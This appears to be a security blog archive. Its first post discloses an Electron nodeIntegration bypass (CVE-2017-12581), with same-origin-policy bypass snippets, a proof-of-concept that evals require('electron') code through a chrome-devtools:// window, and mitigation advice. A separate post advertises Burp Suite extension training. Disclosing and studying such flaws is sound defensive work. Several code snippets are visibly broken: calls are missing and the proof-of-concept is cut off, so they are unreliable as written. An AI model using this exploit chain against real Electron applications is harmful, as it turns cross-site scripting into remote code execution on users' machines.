While Electron is based on Chromium’s Content module, it is not a browser. Since it facilitates the construction of complex desktop applications, Electron gives the developer a lot of power. In fact, thanks to the integration with Node.js, JavaScript can access operating system primitives to take full advantage of native desktop mechanisms.

It is well understood that rendering untrusted remote/local content with Node integration enabled is dangerous. For this reason, Electron provides two mechanisms to “sandbox” untrusted resources:


mainWindow = new BrowserWindow({  
	"webPreferences": { 
		"nodeIntegration" : false,  
		"nodeIntegrationInWorker" : false 



<webview src=""></webview>

In above examples, the nodeIntegration flag is set to false. JavaScript running in the page won’t have access to global references despite having a Node.js engine running in the renderer process.

Hunting for nodeIntegration bypasses

It should now be clear why nodeIntegration is a critical security-relevant setting for the framework. A vulnerability in this mechanism could lead to full host compromise from simply rendering untrusted web pages. As modern alchemists, we use this type of flaws to turn traditional XSS into RCE. Since all Electron applications are bundled with the framework code, it is also complicated to fix these issues across the entire ecosystem.

During our research, we have extensively analyzed all project code changes to uncover previously discovered bypasses (we counted 6 before v1.6.1) with the goal of studying Electron’s design and weaknesses. Armed with that knowledge, we went for a hunt.

By studying the official documentation, we quickly identified a significant deviation from standard browsers caused by Electron’s “glorified” JavaScript APIs.

When a new window is created, Electron returns an instance of BrowserWindowProxy. This class can be used to manipulate the child browser window, thus subverting the Same-Origin Policy (SOP).

SOP Bypass #1

const win =""); 
win.location = "javascript:alert(document.domain)"; 

SOP Bypass #2

const win =""); 

The eval mechanism used by the SOP Bypass #2 can be explained with the following diagram:

BrowserWindowProxy's Eval

Additional source code review revealed the presence of privileged URLs (similar to browsers’ privileged zones). Combining the SOP-bypass by design with a specific privileged url defined in lib/renderer/init.js, we realized that we could override the nodeIntegration setting.

Chrome DevTools in Electron, prior to 1.6.8

A simple, yet reliable, proof-of-concept of the nodeIntegration bypass affecting all Electron releases prior to 1.6.7 is hereby included:

<!DOCTYPE html>
    <title>nodeIntegration bypass (SOP2RCE)</title>
    	document.write("Current location:" + window.location.href + "<br>");

    	const win ="chrome-devtools://devtools/bundled/inspector.html");
    	win.eval("const {shell} = require('electron'); 

On May 10, 2017 we reported this issue to the maintainers via email. In a matter of hours, we received a reply that they were already working on a fix since the privileged chrome-devtools:// was discovered during an internal security activity just few days before our report. In fact, while the latest release on the official website at that time was 1.6.7, the git commit that fixes the privileged url is dated April 24, 2017.

The issue was fixed in 1.6.8 (officially released around the 15th of May). All previous versions of Electron and consequently all Electron-based apps were affected. Mitre assigned CVE-2017-12581 for this issue.

Mitigating nodeIntegration bypass vulnerabilities

  • Keep your application in sync with the latest Electron framework release. When releasing your product, you’re also shipping a bundle composed of Electron, Chromium shared library and Node. Vulnerabilities affecting these components may impact the security of your application. By updating Electron to the latest version, you ensure that critical vulnerabilities (such as nodeIntegration bypasses) are already patched and cannot be exploited to abuse your application.

  • Adopt secure coding practices. The first line of defense for your application is your own code. Common web vulnerabilities, such as Cross-Site Scripting (XSS), have a higher security impact on Electron hence it is highly recommend to adopt secure software development best practices and perform periodic security testing.

  • Know your framework (and its limitations). Certain principles and security mechanisms implemented by modern browsers are not enforced in Electron (e.g. SOP enforcement). Adopt defense in depth mechanisms to mitigate those deficiencies. For more details, please refer to our Electronegativity, A study of Electron Security presentation and Electron Security Checklist white-paper.

  • Use the recent “sandbox” experimental feature. Even with nodeIntegration disabled, the current implementation of Electron does not completely mitigate all risks introduced by loading untrusted resources. As such, it is recommended to enable sandboxing which leverages the native Chromium sandbox. A sandboxed renderer does not have a Node.js environment running (with the exception of preload scripts) and the renderers can only make changes to the system by delegating tasks to the main process via IPC. While still not perfect at the time of writing (there are known security issues, sandbox is not supported for the <webview> tag, etc.) this option should be enabled to provide additional isolation.

Developing Burp Suite Extensions training

1 March 2017 at 23:00
We couldn't be more excited to present our brand-new class on web security and security automation. This blog post provides a quick overview of the 8-hours workshop.


Developing Burp Suite Extensions - From manual testing to security automation.


Ensuring the security of web applications in continuous delivery environments is an open challenge for many organizations. Traditional application security practices slow development and, in many cases, don’t address security at all. Instead, a new approach based on security automation and tactical security testing is needed to ensure important components are being tested before going live. Security professionals must master their tools to improve the efficiency of manual security testing as well as to deploy custom security automation solutions.

Based on this premise, we have created a brand-new class taking advantage of Burp Suite - the de-facto standard for web application security. In just eight hours, we show you how to use Burp Suite’s extension capabilities and unleash the power of the tool to improve efficiency and effectiveness during security audits.

After a quick intro to Burp and its extension APIs, we work on setting up an optimal development environment enabling fast coding and debugging. While we develop our code using Oracle’s Netbeans, we also provide templates for IntelliJ IDEA and Eclipse.

We will create many different types of plugins:

  • Extension #1: A custom logger to provide persistency and data export functionalities
  • Extension #2: A simple (and yet useful) replay tool
  • Extension #3: Active check for Burp’s scanning engine
  • Extension #4: Passive check for Burp’s scanning engine

Finally, we leverage our extensions to build a security automation toolchain integrated in a CI environment (Jenkins). This workshop is based on real-life use cases where the combination of custom checks and automation can help uncovering nasty security vulnerabilities.

All templates and code-complete Burp Suite extensions will be available for free on Doyensec’s Github. If you are curious, we’ve already uploaded the first three modules.


The training is suitable for both web application security specialists and developers. Attendees are expected to have rudimental understanding of Burp Suite as well as basic object-oriented programming experience (Burp extensions will be developed in Java).


Attendees should bring their own laptop with the latest Java as well as their favourite IDE installed.

Upcoming dates

Location Date Notes
March 21, 2017 Delivered during Troopers 2017 security conference. There are still seats available. Book it today and get Burp swag during the training!
June 5, 2017 Come for WarCon invite-only conference, stay for the training!
For registration, please contact [email protected] with subject line "Burp Training Post-WarCon".

Private training

This training is delivered worldwide (English language) during both public and private events. Considering that the class is hands-on, we are able to accept up to 15 attendees. Video recording available on request.

Feel free to contact us at [email protected] for scheduling your class!
